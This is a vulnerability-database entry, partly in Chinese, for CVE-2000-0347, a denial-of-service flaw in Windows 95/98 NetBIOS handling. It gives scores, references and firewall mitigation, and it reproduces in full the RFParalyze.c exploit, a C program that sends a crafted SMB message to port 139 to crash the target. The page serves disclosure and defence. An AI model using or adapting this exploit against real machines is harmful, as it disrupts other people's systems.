CVE-2000-0347
CVSS5.0
发布时间 :2000-05-02 00:00:00
修订时间 :2016-10-17 22:06:51
NMCOE    

[原文]Windows 95 and Windows 98 allow a remote attacker to cause a denial of service via a NetBIOS session request packet with a NULL source name.


[CNNVD]Microsoft Windows 9x SMB_COM_SEND_SINGLE_BLOCK(0xD0)拒绝服务攻击漏洞(CNNVD-200005-015)

        
        Windows 95/98是Microsoft公司开发的流行的通用操作系统。
        Windows 95/98在处理winpopup消息时存在漏洞,远程攻击者可能利用此漏洞对机器进行拒绝服务攻击。
        当Windows 95/98收到一个畸型的winpopup消息时,Windows 95/98发生不可预料的错误:系统崩溃、蓝屏、重起动、死锁或者丢失网络连接等等。
        执行nbtstat -A ,如果看到
        VICTIM <03> UNIQUE Registered
        并且可以telnet 139的话,就可能受此漏洞影响。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_95Microsoft Windows 95
cpe:/o:microsoft:windows_98::goldMicrosoft windows 98_gold

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0347
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0347
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200005-015
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=ntbugtraq&m=95737580922397&w=2
(UNKNOWN)  NTBUGTRAQ  20000501 el8.org advisory - Win 95/98 DoS (RFParalyze.c)
http://www.securityfocus.com/bid/1163
(UNKNOWN)  BID  1163

- 漏洞信息

Microsoft Windows 9x SMB_COM_SEND_SINGLE_BLOCK(0xD0)拒绝服务攻击漏洞
中危 其他
2000-05-02 00:00:00 2005-05-02 00:00:00
远程※本地  
        
        Windows 95/98是Microsoft公司开发的流行的通用操作系统。
        Windows 95/98在处理winpopup消息时存在漏洞,远程攻击者可能利用此漏洞对机器进行拒绝服务攻击。
        当Windows 95/98收到一个畸型的winpopup消息时,Windows 95/98发生不可预料的错误:系统崩溃、蓝屏、重起动、死锁或者丢失网络连接等等。
        执行nbtstat -A ,如果看到
        VICTIM <03> UNIQUE Registered
        并且可以telnet 139的话,就可能受此漏洞影响。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 安装个人防火墙阻止外部网络对于139端口的连接。
        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/technet/security/

- 漏洞信息 (19889)

Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability (EDBID:19889)
windows remote
2000-05-02 Verified
0 rain forest puppy
N/A [点击下载]
source: http://www.securityfocus.com/bid/1163/info

Unpredictable results, including system crashes, lock-ups, reboots, and loss of network connectivity, can occur in Windows 95/98 if a NetBIOS session packet is received with the source host name set to NULL.

/*********************************** www.el8.org **** www.wiretrip.net **/

/* 	- el8.org advisory: RFParalyze.c 

	code by rain forest puppy <rfp@wiretrip.net>   -
   	coolness exhibited by Evan Brewer <dm@el8.org> -

	- Usage: RFParalyze <IP address> <NetBIOS name>

	where <IP address> is the IP address (duh) of the target (note:
	not DNS name).  <NetBIOS name> is the NetBIOS name (again, duh) of
	the server at the IP address given.  A kiddie worth his scripts
	should be able to figure out how to lookup the NetBIOS name.  
	Note: NetBIOS name must be in upper case.

	This code was made from a reverse-engineer of 'whisper', a 
	binary-only exploit found in the wild.

	I have only tested this code on Linux.  Hey, at least it's
	not in perl... ;)   -rfp

*/

#include <stdio.h>		/* It's such a shame to waste   */
#include <stdlib.h>		/* this usable space. Instead,  */
#include <string.h>		/* we'll just make it more      */
#include <netdb.h>		/* props to the men and women   */
#include <sys/socket.h>		/* (hi Tabi!) of #!adm and      */
#include <sys/types.h>		/* #!w00w00, because they rock  */
#include <netinet/in.h>		/* so much.  And we can't forget*/
#include <unistd.h>		/* our friends at eEye or       */
#include <string.h>		/* Attrition. Oh, +hi Sioda. :) */

/* 	Magic winpopup message
	This is from \\Beav\beavis and says "yeh yeh"
	Ron and Marty should like the hardcoded values this has ;)  
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";

struct sreq /* little structure of netbios session request */
        {
        char first[5];  
        char yoname[32];
        char sep[2];
        char myname[32];
        char end[1];
        };

void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/

int main(int argc, char *argv[]){
char buf[4000], myname[33], yoname[33];
struct sockaddr_in sin;
int sox, connex, x;
struct sreq smbreq;

printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");

if (argc < 3) {
printf("Usage: RFParalyze <IP of target> <NetBIOS name>\n");
printf("       --IP must be ip address, not dns\n");
printf("       --NetBIOS name must be in UPPER CASE\n\n");
exit(1);}

printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");

Pad_Name("WICCA",myname);  /* greetz to Simple Nomad/NMRC */
myname[30]='A';	           /* how was Beltaine? :)        */
myname[31]='D';

Pad_Name(argv[2],yoname);
yoname[30]='A';
yoname[31]='D';
printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);

sin.sin_addr.s_addr = inet_addr(argv[1]);
sin.sin_family      = AF_INET;
sin.sin_port        = htons(139);

sox = socket(AF_INET,SOCK_STREAM,0);
if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
    perror("Problems connecting: ");
    exit(1);}

memset(buf,0,4000);

memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
memcpy(smbreq.sep,"\x00\x20",2);               /*no need to worry about*/
memcpy(smbreq.end,"\x00",1);                   /*what it does :)       */
strncpy(smbreq.myname,myname,32);
strncpy(smbreq.yoname,yoname,32);

write(sox,&smbreq,72);  /* send initial request */
x=read(sox,buf,4000);   /* get their response   */

if(x<1){ printf("Problem, didn't get response\n");
        exit(1);}

if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
else {printf("We didn't get back the A-OK, bailing.\n");
        exit(1);}

write(sox,&blowup,72);  /* send the magic message >:)     */
x=read(sox,buf,4000);   /* we really don't care, but sure */
close(sox);
printf("done\n");
}

void Pad_Name(char *name1, char *name2)
{ char c, c1, c2;
  int i, len;
  len = strlen(name1);
  for (i = 0; i < 16; i++) {
    if (i >= len) {
     c1 = 'C'; c2 = 'A'; /* CA is a space */
    } else {
      c = name1[i];
      c1 = (char)((int)c/16 + (int)'A');
      c2 = (char)((int)c%16 + (int)'A');
    }
    name2[i*2] = c1;
    name2[i*2+1] = c2;
  }
  name2[32] = 0;   /* Put in the null ...*/
}


/*********************************** www.el8.org **** www.wiretrip.net **/		

- 漏洞信息

1308
Microsoft Windows NetBIOS NULL Source Name DoS
Remote / Network Access Denial of Service
Loss of Availability Discontinued Product
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-05-11 Unknow
Unknow Unknow

- 解决方案

The vendor has discontinued this product. It is recommended that an alternate software package be used in its place.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站